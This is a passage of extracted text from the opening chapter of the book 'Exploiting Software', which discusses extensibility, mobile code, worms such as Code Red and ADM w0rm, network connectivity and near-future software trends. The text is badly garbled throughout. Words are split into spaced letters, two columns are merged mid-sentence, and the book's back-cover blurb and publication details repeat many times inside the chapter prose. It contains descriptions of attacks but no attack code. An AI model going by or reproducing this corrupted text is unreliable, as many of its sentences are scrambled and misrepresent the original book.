bu g t arg et s Rev er se engineer in g Clear ly t he at t ack er is on t he w inn in g side of t hese n um ber s. I t is no sur pr ise, g iv en t he Classic at t acks ag ainst serv er soft w ar e hom ogeneit y of op er at ing syst em s and app licat ions ( lead in g t o t h ese skew ed num ber s) , t hat w or ms likpre ising t h e Blast er wag or ainst m of 2clien 003t ar e so at p rop agat ing . [ 10] Sur at t acks soft warsuccessful e [ 10]

Some securit y r esearchers conj ect ure that diversity might help addr ess the pr oblem, but experim ents

Tech es f or this cr aftidea ingtomwaliciou s inpu t is m or e difficult th an it appear s at fir st blush. show niqu th at getting or k in practice The t echn ical det ails of b uf fer ov er f low s

Extensibility Root k it s Ex p lo o ft wbuilt a re is f illed witthu al t h emtach ools, con( VMs) cept s,t hand ow vledg necessar y tdo car b reak Mod er int in sygstSems arou nd vir ines at pkn reser e t yepe saf et y an r y out soft aree.secu r it y access ch eck s—in t h is w ay allow in g u nt r ust ed m ob ile code t o b e r untwim execut ed—ar e ext ensible sy st em s . Tw o pr ime ex am ples are Java and . NET. An ext en sible host accept s u pdat es or ex t ensions, somet im es r ef er r ed t o as m obile code, so t hat t he syst em 's f un ct ion alit y can be ev olved in an incr ement al fashion . For ex am ple, a Java Virt u al Machine ( JVM) w ill inst an t iat e a class in a nam esp ace and pot ent ially allow ot h er classes t o int er act w it h it . Most mod er n oper at ing sy st ems ( OSs) sup por t ex t en sib ilit y t hr ough dy nam ically load able dev ice d riv ers and m odules. Today 's ap plicat ion s, su ch as wor d pr ocessor s, e- m ail clien t s,

spr ead sheet s, an d W eb br ow ser s, sup por t ex t en sib ilit y t h r ough scr ipt in g, cont r ols, com ponent s, d yn amically loadable libr ar ies, an d ap plet s. But none of t h is is r eally new . I n fact , if y ou t hink about it , soft w ar e is r eally an ex t ensib ilit y vect or for general- p ur pose com put er s. Soft w ar e pr ogr am s d ef ine t he behav ior of a com put er , and ex t en d it in in t erest ing and nov el w ay s. Unfor t u nat ely, t he v er y n at ur e of m oder n, ex t en sib le sy st em s m ak es secur it y har d er . For on e t hin g, it is har d t o pr ev en t m aliciou s cod e fr om slipp in g in as an un w ant ed ex t ension, • Table of Content s m ean ing t he f eat ur es design ed t o add ext ensibilit y t o a sy st em ( su ch as Jav a' s class- loading • I ndex m ech anism ) m ust b e desig ned w it h secur it y in m ind. Fu rt h er m or e, analy zin g t he secu rit y of Expl oit ing Softw a re How to Br e ak Code an ex t ensible sy st em is m u ch har der t h an analyzin g a comp let e sy st em t hat can't be By Gr eg ed Hoglund y McGr chang . How, Gar can you aw t ak e a look at code t hat has y et t o arr iv e? Bet t er yet , h ow can you even begin t o an t icip at e ever y kin d of m ob ile code t hat may arr iv e? These and ot her secu rit y issuPub es lish suer: rr oun dingWesley m obile code ar e discussed at leng t h in Secu ring Jav a [ McGraw and Felt en, Addison 19 99] . Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8

Micr osof t h as ju mp ed h ead lon g in t o t h e m obile code f ray w it h t h eir . NET fr am ewor k . As 51 2 Figur ePages: 1- 6 sh ows, . NET ar ch it ect u re h as m uch in com m on w it h Jav a. On e m ajor d if fer ence is a sm aller em ph asis on m ult ip lat f or m supp ort . But in an y case, ex t en sib le sy st ems are clearly her e t o st ay . Soon , t he t er m m obile code w ill b e r ed und ant , b ecause all cod e w ill be m obile.

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls,Figu int ru sion ion sy.NET st em s,f rand ir usk soft war et enct ot u k eep g outi ce t het bad r e 1det - 6ect . The a mant ewiv or a r chi r e .inNot he g uy s? What t ools can sed tiolabrreak is book rovfor idesmt he answ s. ion , ju st -i na r chi t e ct u rbe al usim it y soft w i twar h te? h eThJav a plp at : ve r if er i cat

t i m e ( JI T) com pi la t i on , cl ass loa di ng, code si gn in g, a nd a VM .

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at[ View t acksfullare really carr ied ou t . size im age] This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Mob ile code has a dar k sid e t hat goes bey ond t he r isks inher en t in it s design for ex t ensib ilit y . I n som e sense, vir uses and wserv or ms kind Classic at t acks ag ainst er are soft w ar es of m obile code. That ' s w hy t h e add it ion of execut ab le e- m ail at t ach ment s and VMs t h at r un code em bedded on Web sit es is a secu r it y nigh t m are. Classic v ect or of t h eclien pastt ,soft includ Sur pr ising at t acks ags ainst warin e g t he " sneak er net " and t he in fect ed execut ab le sw apped over m odem s, hav e been replaced b y e- mail and Web cont ent . Mobile code- based Techar niqu f orucr aftby ingt hmealiciou s inpu t er un derg rou nd. At t ack vir uses and at t ack w eapons e bes eing sed m odern h ack w or ms don' t sim ply pr opag at e, t hey inst all b ack door s, m onit or sy st em s, and com pr om ise The tfor echn b uf fers pu ov rp er foses. low s m achines latical er udet se ails in nof ef ar iou Root k it s e v ery p opular in t h e ear ly 19 90s and w er e m ost ly spr ead t h rou gh infect ed Vir uses b ecam execut ab le files sh uff led ar oun d on d isk s. A w or m is a sp ecial k ind of vir us t hat sp reads over Ex in g S odoes ft w a not re isr fely illed h tinh fect e t ools, con cept s, eand kn ow ledger e ous necessar b reak netpwlo ori tks and onwit f ile ion . Wor m s ar a v ery dang t w ist yont ot he classic soft e. ar e esp ecially im p ort an t g iven our m oder n reliance on net w or ks. Wor m act iv it y v iruw s ar and becam e w id espr ead in t h e lat e 19 90s, alt h ough m any d anger ous w or m s w er e n eit h er well pu blicized nor w ell un derst ood . Since t he ear ly day s, larg e adv ances hav e been mad e in w or m t ech nology . Wor m s allow an at t ack er t o " car pet b omb " a net w ork in an un br idled exp lorat ion t hat at t em pt s t o exp loit a g iven vu lnerab ilit y as w id ely as possib le. Th is am plifies t he over all eff ect of an at t ack an d ach iev es result s t h at could nev er be obt ain ed by man ually hack ing one m achine at a t im e. Becau se of t he successes of w orm t echn ology in t he lat e 19 90s, m ost if n ot all g lob al 10 00 comp anies hav e been in fect ed w it h backd oors. Rum or s abou nd in t he un derg rou nd r eg ard ing t he so- called Fort une 5 00 List —a list of cu rr ent ly

w or king b ack door s t o t he For t un e 500 com pany net w ork s. On e of t he f irst st ealt hy , m aliciou s w or ms t o inf ect t he g lobal n et w or k an d t o be w idely used as a hackin g t ool w as w r it t en by a v er y secr et iv e gr oup in t he hack er und er gr ou nd calling it self ADM, shor t for Associat ion De Malfait eur s. Th e w orm , called ADM w 0r m [ 11] ex ploit s a bu ff er over flow v ulner abilit y in dom ain n am e ser v er s ( D NS) . [ 12] Once inf ect ed, t h e v ict im m achine begin s scan ning for ot her v ulner able ser v er s. Tens of t h ousands of machin es w er e inf ect ed w it h t h is w orm , b ut lit t le ment ion of t h e w orm ev er m ade t h e pr ess. Som e of ADM's • Table of Content s or iginal v ict ims rem ain in fect ed t o t his d ay. Alar m ingly , t h e DNS v ulner abilit y used by t his • I ndex w or m only scrat ch ed t h e su rf ace. The w or m it self w as d esigned t o allow ot her exp loit Expl oit ing Softw a re How to Br e ak Code t echniqu es t o be added t o it s ar senal easily . Th e w orm it self w as, in f act , an ex t ensible By Gr eg , Garonly y McGr syst emHoglund . We can guawess at how man y v er sions of t h is wor m ar e cur r ent ly in use on t he I nt er net t od ay. Pub lish er: Addison Wesley [ 11]

ADMw0r m- v1.tar can be found on v ar ious I nter net sit es and contain s the sour ce code to the infamous ADM w 0r m that fir st appeared in spring 1998.

Pub Dat e: February 17, 200 4

I SBN: 0- 20 1- 786 95 -8 Mor 51 e infor m ation on BI ND pr oblems can be found at http: / / w w w .cer t.or g/ adv isor ies/ CAPages: 2

[ 12]

98.05.bind_pr oblem s.html.

I n 200 1, a fam ous n et wor k w or m called Cod e Red m ad e headlines by in fect in g hun dr ed s of t hou san ds of serv er s. Code Red inf ect s Micr osoft I I S Web serv er s by ex ploit ing a v ery sim ple and un for t un at ely perv asive sof t w are pr oblem . [ 13] As is usually t he case w it h a successfu l How d oes w are br eak ? How at vt acker s m ake w arm e br eak on p ur pose? and hig hlysof putblicized at t ack, sevdo er al ar iat ions of t hsof is twor hav e been seen in Why t he ware ild. Code fir ewinfect alls, int sion and ant ivf or ir us softion war k eep in g or out t he ver badsion g uyof s? Red s aruser verdet anect d tion hensy b st egem inss,scanning addit alet n arot get s. The iginal What t oolshas cana be sed t o t bo reak warm e?achines Th is book rov he answ Cod e Red t enudency scansoft ot her t hatpar e ides in prtoxim it y ter o s. t he inf ect ed net w or k. This lim it s t he speed wit h w hich st andar d Code Red spr eads. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d [ 13] Code Red ex ploits a buffer over flow in the idq.dll, a com ponent of I SAPI . t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Pr om pt ly aft er it s net w ork debut , an im pr ov ed v ersion of Code Red w as r eleased t hat fix ed tThis his pmr oblem andbook added anshock opt imyized scanning hm teducat o the m ThGet is fu rt her ust - h ave m ay ou—and it willalgor cer titainly e ix. y ou. t ing beyincreased ond t he tscr heipt sp keed at w h ich Cod e Red in fect s syst em s. The success of t h e Code Red w or m r est s on a id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t v er y sim ple soft w ar e f law t hat has b een w idely ex ploit ed f or m or e t han 20 y ears. Th e fact t hat a lar ge num ber of Win dow s- based m achines shar e t he f law cert ain ly help ed Code Red Why t w ar easexitploit spr ead as qsof uickly did. w ill con t inue t o be a ser ious p r oblem When net or ke secur y m domns, ot including w or k Sim ilar ef fect sw hav been itnot edech f oranisms new wor Blast er and Slam mer . We w ill fu r t her add ress t he malicious code p rob lem an d it s r elat ion t o ex ploit ing soft w ar e lat er in t he t ack pat t er nse a look at hack in g t ools t hat ex ploit sof t w ar e. book .At We' ll also t ak Rev er se engineer in g

Connectivity Classic at t acks ag ainst serv er soft w ar e pr ising atect t acks clien The gSur r owin g conn iv it yagofainst comp ut ert ssoft t hrwar ougeh t he I nt er net h as increased b ot h t he nu m ber of at t ack v ect or s ( av enues f or at t ack ) and t h e ease w it h w hich an at t ack can be mad e. Tech es f orf rcr afthom ing m aliciou t s t h at cont r ol cr it ical infr ast r uct ur es ( such as t he Con nect ionniqu s r ange om e PCs t o ssyinpu st em pow er gr id) . The h ig h d eg r ee of conn ect iv it y m akes it possib le for sm all failur es t o pr opagat e The t echn ical det ails of b uf fer ov er f low s and cause m assiv e out ag es. Hist or y has p r oved t his w it h t eleph one n et w or k out ages and pow erRoot sy stkem it s g rid f ailu res as d iscussed on t he mod er at ed COMP. RI SKS mailing list and in t he book Com pu t er- Relat ed Risk s [ Neum ann, 199 5] . Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak Becau see.access t hr ough a net w ork does not r eq uire hum an int er vent ion , launching soft w ar aut om at ed at t acks is relat iv ely easy. Aut om at ed at t ack s chan ge t h e t hr eat land scape. Con sider v er y ear ly f orm s of h ack ing . I n 1 975 , if you w ant ed t o mak e f ree p hone calls y ou needed a " blu e box ." The blue box cou ld b e pur chased on a college cam pus, b ut you needed t o find a dealer . Blue b oxes also cost m oney . This m eant t hat only a few p eop le had blue box es and t he t hr eat pr opag at ed slow ly. Cont r ast t hat t o t od ay: I f a v ulner abilit y is un cov ered t hat allow s at t acker s t o st eal Pay - Per - View t elev ision, t he inf or mat ion can be post ed on a Web sit e an d a m illion people can dow nload t he ex ploit in a mat t er of hour s, deeply im pact ing pr ofit s im m ediat ely .

New pr ot ocols and deliver y m ed ium s ar e un der con st ant developm ent . Th e upshot of t his is m or e cod e t hat hasn' t b een w ell t est ed. New devices ar e u nder d ev elop m en t t h at can con nect y our r efr iger at or t o t he m anu fact ur er. Your cellu lar phon e has an em bedded OS com plet e w it h a f ile sy st em . Figur e 1- 7 sh ows a par t icular ly adv anced n ew phon e. I m agin e w hat wou ld hap pen w h en a vir us in fect s t he cellu lar phon e net w or k.



Table of Content s

Figu r eI ndex 1 - 7 . This is a com pl ex m obi le ph one of f er e d b y Nok ia . As ph one s gai n f un cte ak i ona Expl oit ing Softw a re How to Br Codeli t y such a s e- m a il a nd W eb br ow si ng, t he y be com e m or e su scept ibl e t o sof t w ar e e x ploit . By Gr eg Hoglund , Gar y McGr aw •

Pub lish er: Addison Wesley

Court e sy of N ok ia .

Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Highly conn ect ed net w or ks ar e especially v ulner able t o ser vice ou t ages in t he f ace of n et wor k w or ms. ad ox ofinnet RevOne er separ engineer g w ork ing is t h at hig h conn ect iv it y is a classic mechanism f or incr easing av ailab ilit y an d reliabilit y, but pat h div ersit y also leads t o a d irect incr ease in w or mClassic sur viv abilit y . ag ainst serv er soft w ar e at t acks Finally, m ostatim por t ant aspect oft tsoft he global Surt he pr ising t acks ag ainst clien war e n et w or k is econom ic. Ev er y econom y on eart h is conn ect ed t o ev er y ot h er . Billions of d ollar s f low t hr oug h t his net w or k ever y second , es f or cr aftday ing. m aliciou inpu t r illionTech s of niqu dollars ev ery The SWIsFT n ett wor k alone, w h ich connect s 7, 0 00 in t ern at ional fin ancial comp anies, mov es t r illions of dollars ev ery day . Wit hin t his int er connect ed sy st em , echn of icalsof det fer ov f low st o on e anot h er and com m un icat e in a massive hu ge The nu mtbers t wails are of sy bstuf ems conernect st r eam of num ber s. Nat ions and m ult inat ion al cor por at ions ar e depend en t on t h is mod er n k itfab s r ic. A glit ch in t h is sy st em cou ld p r oduce inst ant cat ast rop he, dest abilizing inf ormRoot at ion ent ir e econ omies in second s. A cascadin g f ailur e could w ell b ring t h e ent ir e vir t ual w orld t o a Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak gr ind in g halt . Ar guab ly, one t ar get of t he despicable act of t er r orism on Sept em ber 11, 200 1, soft w ar e. w as t o disru pt t he w or ld f inancial sy st em . Th is is a m oder n risk t hat w e m ust face. The p ublic m ay n ev er k now h ow m any soft war e at t ack s ar e lever aged against t h e fin ancial syst em ev er y day . Ban ks are ver y good abou t k eep in g t his inf orm at ion secr et . Giv en t h at net w or k- en abled com put er s hav e b een con fiscat ed f rom man y conv ict ed crim inals and k now n t er ror ist s, it w ould not be sur p rising t o lear n t hat cr im inal and t er r orist act iv it y includes at t ack s on finan cial n et wor k s.

The Upshot Tak en t og et h er , t he t r init y of t r oub le has a deep im pact on soft war e secu r it y. Th e t hr ee t r ends of g row ing sy st em com plex it y , b uilt - in ex t ensibilit y, and ubiqu it ous n et w or k ing ( or connect ivit y ) mak e t h e soft w ar e secur it y p rob lem m or e u rg en t t h an ev er . Unf or t unat ely f or t he good guy s, t he t r in it y of t r ouble h as a t end en cy t o m ak e exp loit ing soft war e m u ch easier ! •I n Mar ch 20 03, Tablet he of Content s er Secu rit y I n st it u t e r eleased it s eight h an nual su rv ey show ing Com p ut •t hat 56 % of Itndex h e 524 com panies and lar ge inst it u t ions polled ack now ledged suff er ing f inancial Expl oit ing Softw to Br eput ak er Code losses r esu lt inagrefrHow om com b reaches du rin g t h e pr eviou s year . The maj or it y of t hese brGr each es w er e car out over t h e I nt ern et . Of t h e com p rom ised t ar get s, t h e 251 w illin g t o By eg Hoglund , Gar y ried McGr aw t ally t heir losses ad mit t ed t hat t he hackin g cost t h em r oughly $ 202 m illion collect iv ely . Ev en if t hese num b er s ar e of f by a fact or of t en, t hey are st ill u naccep t ably high . Alt hou gh t he Pub lish er: Addison Wesley par t icular nu m bers repor t ed in t h is high ly popu lar su rv ey can b e disput ed , t r en ds em er g in g Dat e: February 17, 200 4 fr omPubt he ann ual com plet ion of t his sur vey ar e an excellent ind icat or of t he gr ow t h and I SBN: 095 -8pu t er secur it y pr ob lem . im por t ance of20t1he786 com Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

The Future of Software The sof t w are secur it y pr oblem is lik ely t o get w or se befor e it get s bet t er . The pr oblem is t hat soft w ar e it self is chan ging fast er t h an sof t w are secur it y t ech nology . The t r in it y of t r ouble h as a sign ificant im pact on man y of t he t rend s out lined in t h is sect ion. •

Table of Content s

•At t he r isk ofI ndex bein g ser iously wr on g, w e n ow consult ou r cry st al b all and peer int o t he f ut ur e Expl oit ing a re mission How to Bris e ak of soft w arSoftw e. Our t oCode un derst an d w h er e t h in gs ar e g oin g and t hink ab out how t h ey w ill im Hoglund pact soft w ar e secu By Gr eg , Gar y McGr aw rit y and t he ar t of ex ploit ing soft w ar e. Ou r pr esent at ion is or gan ized in t hr ee t ime ran ges. ( Of cour se, an yon e w ho pur por t s t o pr edict w hat is com in g is dest in ed t o be w r ong. So t ak e t hese m usings wit h a gr ain of salt . [ 14] ) Pub lish er: Addison Wesley

[ 14] Pub Dat e: ack February 17, 200 4 is in or der . This m aterial w as dev eloped w it h t he input of m any people, not t he An now ledgem ent

least of 0w20 hom m ake I SBN: 1- 786 95 -8up Cigital's Technical Advisor y Boar d. Maj or contr ibu tor s include Jeff Pay ne ( Cigital) , Peter Neumann (SRI ) , Fr ed Schneider ( Cor nell) , Ed Felten (Pr inceton) , Vic Basilli ( Mary land) , and Elain e Pages: 51(2AT&T) . Of cour se any er r or s and om issions ar e our fault. Wey uker

Short-Term Future: 2003–2004 How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are We b eg in w it h a d iscussion of w h at 's on t h e imm ediat e h orizon as f ar as soft war e g oes. Many fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? of t hese t r ends ar e r eadily app arent as w e w r it e t his b ook. Some hav e been em er gin g f or a What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. few year s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Mor e com p one nt s: Com ponent - b ased soft w ar e is f in ally cat ch in g on . On e r eason for t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om t his is t he need for m or e r obust , reliable, secur e sy st em s. Businesses w it h missionat t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . crit ical code are u sin g sy st em s such as En t erp rise Jav a Beans ( EJB) , CORBA, an d COM ( includin g itbook s .NET inst ant iatyion ) . Comitpon t s twainly r it t eneducat in t hese fr am ewor s w or k t he This m ust - h ave m ay shock ou—and willencer e y ou. Get t ingk bey ond nat u r ally in a d ist r ibu t ed env ir onm en t an d w er e creat ed w it h int er obj ect scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t com mu nicat ion b et w een m u lt ip le ser v er s in m in d. A hand fu l of adv anced d ev elopm en t shops are cr eat ing st andar dized com pon en t s f or special- pu rp ose use ( somet im es creat ing y -ploit cr it ical enttos, be su ch asious a com ponent for p r oper user Why sof t secu w ar eritex w illcom conpon t inue a ser p r oblem aut h en t icat ion ) . This can be ex t r em ely helpfu l w hen t ackling t h e pr oblem of bu ild in g Whenitnet w or k secur it y e, m ech anisms do nard ot wcom or kponent s im p lem ent ing r easonab le secur y - crit ical soft war because st and secur it y ar chit ect ur e can b e int egr at ed seam lessly in t o a new d esign. How ev er, t he ar t At tcomp ack pat t ergns of osin com pon en t s int o a coher en t sy st em w h ile maint ain ing em er gent pr oper t ies su ch as secur it y is ex t r em ely d if ficult and poor ly und er st ood, mak ing Rev er se engineer g w ar e subj ect t o ex ploit at ion. com ponent - b asedinsoft Classic t acks ainst servMicr er soft w 'ar Tig ht e ratOS int ag e gr at i on: osoft se int egr at ion of I nt er net Ex plor er int o it s base OS w as no accident . What w as once a clear line b et w een OS and ap plicat ion has becom e Sur pr ising at t acks ag ainst clien t soft war e v er y b lu r ry . Man y act ivit ies t hat once r equir ed special- pur pose app licat ions now com e st andar d in man y OSs, and w hat app ear t o b e st and- alone applicat ions of t en ar e m ere Tech niqu es f or cr aft ing m aliciou s inpu t façad es cr eat ed on t op of m ult iple OS ser v ices. Deep OS int egr at ion lead s t o secu r it y rThe isk b ecauical se itdet r uns t erfert oov t he inciple of com par t m en t alizat ion . When exp loit in g t echn ailscoun of b uf er fpr low s an applicat ion has as a sid e effect of com plet e com pr omise of t h e OS, ex ploit ing a syst Rootem k it st h rou gh soft w ar e becomes m uch easier . gin e nca psu la t ion at ing st ems t enkn d tow o do t oo m u ch , iny any Ex p loBe i t in g nin S o ftgwofa re is f illed wit h t h: eOper t ools, consy cept s, and ledg e necessar t o b case. reak This leads t o secur it y an d r eliabilit y pr oblems. One w ay t o com b at t h e " t oo m u ch st uf f" soft w ar e. ph en omenon b rou ght abou t by t ight int egr at ion of applicat ions and OSs is t o encapsulat e lik e fu nct ions t oget her and t h en pr ot ect t h em fr om t h e out side. A g ood exam ple of w h at w e m ean can be foun d in t h e en cap su lat ion of t h e OS by t h e JVM. Th e JVM places m u ch t igh t er con t r ol ov er pr ogr am s t hat it r un s t han a generic OS. This is a boon f or soft w ar e secur it y . Of cour se, adv anced secu rit y mod els b ased on langu agebased en cap su lat ion ar e har d t o get ex act ly r igh t . Man y kn ow n sof t w are ex ploit s h ave been lev eled against t he JVM ( see Secu ring Jav a [ McGr aw an d Felt en , 19 98] ) .

Be gin nin g of w i re le ss: Wireless sy st em adopt ion is begin ning in ear nest . Soon 80 2. 11b an d it s ( hopefu lly im pr ov ed) su ccessor s w ill be w idespr ead. Wir eless net w or kin g h as a lar ge ( negat iv e) imp act on secur it y because it wor k s t o br eak dow n ph ysical bar r ier s ev en m or e. Wit h n o r equir ement f or a w ir e t o con nect m ach ines ph ysically , d et er m in ing w here a secur it y p er im et er is locat ed becom es m uch har der t han it once w as. Soft w ar e exp loit s of w ir eless sy st em s w er e w id ely t ru mp et ed by t he pr ess in 2 001 , and included a com plet e br eak of t he w ir ed equ ivalent pr ivacy ( WEP) encry ptTable ion algor it hm [ 15] an d t he r eem er gence of addr ess resolut ion pr ot ocol ( ARP) • of Content s cach e poisoning at t ack s ( ht t p: / / w w w . cigit al. com / new s/ w ir eless- sec.h t m l ) . 8 02. 11 i is • I ndex being r apidly ad opt ed as t his book goes t o p ress. I t p rom ises a super ior app roach t o Expl oit ing Softw a re How to Br e ak Code secur it y t h an t he m uch- m align ed WEP. By Gr eg Hoglund , Gar y McGr aw [ 15]

The WEP cr ack w as popular ized by Av i Rubin and Adam Stubblefield. For m or e infor mation, see http: / / w w w .ny times.com/ 2001/ 08/ 19/ technology / 19 WI RE.htm l or http: / / w w w .avir ubin.com .

Pub lish er: Addison Wesley

Pub Dat e: February 200ot 4 he r Mor e PDA s ( 17, a nd

e m be dde d sy st em s) : PDAs like t he Palm Pilot ar e b ecom ing I SBN: 0- 20 1- 786 95 -8 com mon place. New g en er at ions of t hese devices inclu de em bedded I nt er net capabilit y . Pages:sp 51rin 2 g's Treo r epr esent s t he conv erg en ce of phon e, PDA, and e- m ail syst em int o Hand one h ighly p ort ab le net w or ked device. These devices ar e sim p le, h and- h eld net w or k app lian ces t h at can be u sed t o car r y out m any secur it y - crit ical act iv it ies, includin g check ing e- m ail, ord er ing din ner, and buy ing st ocks. PDAs are oft en pr ogr am med r em ot ely and m ak e use of t he mob ile cod e par adigm t o r eceiv e and inst all new ogrsof amts. Alt hou gh ?t her e hav e tbeen soft wsof artewexp s of on PDAs o dat e, st andar How dproes w are br eak How do at ackerfsewm ake ar e loit br eak p urtpose? Why are d PDAs d o n ot t y pically in clu de a secur it y fr am ew ork . fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Log ical ly d ist ri but e d syst e m s: Com ponent - b ased soft w ar e and d ist r ibut ed syst em s Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d go hand in han d. Com p onent s, don e r ig ht , p rov ide log ical pieces of fu nct ionalit y t hat t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om can be pu t t og et h er in in t er est in g way s. Funct ionalit y of a comp let e sy st em is t hus at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . logically dist ribu t ed am on g a num b er of in t er conn ect ed com pon en t s. This sor t of must odular h elpf ul in ytou—and h e senseitt hwill at itcer enables sep arat concern s as w ell This m - h avedesign book is m ay shock t ainly educat e ion y ou.ofGet t ing bey ond t heas com par t m en t alizat ion , y et at t he sam e t im e dist rib ut ed sy st em s ar e com plicat ed an d scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t har d t o g et r ight . The m ost com m on d ist r ibu t ed sy st em s t od ay ar e geogr aphically colocat ed and oft en m ak e use of a sing le com m on pr ocessor. The Wind ow s fam ily of OSs, sof m ade of ploit hun dr of t com such as pDLLs, is a p r im e ex am ple. Window s is Why t w aruep ex w ed ill scon inueptonent o be as ser ious r oblem a log ically dist r ibut ed syst em . Un for t un at ely , com plexit y is t he f riend of soft w ar e exp loitnet ; t hu s, kdist r ib ut stanisms ems oftdo en nmak t hke job of exp loit in g sof t w ar e easier. When w or secur it yed m sy ech ot weor pat tier IAtntt ack r oduct onnsof . N ET: Micr osoft has j oined t he m obile code f r ay w it h t h e int r odu ct ion of . NET. Usually, wh en Micr osof t en t er s a m ark et in a ser iou s w ay , t his is a sig n t hat t he Rev seisengineer g r ead y t o b e exp loit ed. Java int r odu ced t he w or ld t o m obile code m arer ket mat u r e inand and m oder n n et wor k - cen t r ic sof t w ar e desig n. . NET is lik ely t o p lay a r eal r ole in m ob ile Classic serv soft w ar e anced secur it y m odels m eant t o p rot ect ag ainst code asat it t acks evolvag es.ainst Exp loit s er against adv m alicious mob ile cod e hav e been d iscussed f or y ear s. The em erg en ce of an ent ir e r ang e Sur pr ising t acks, rag ainst soft war of VM t echnatology unn in g clien fr omt VMs f or et 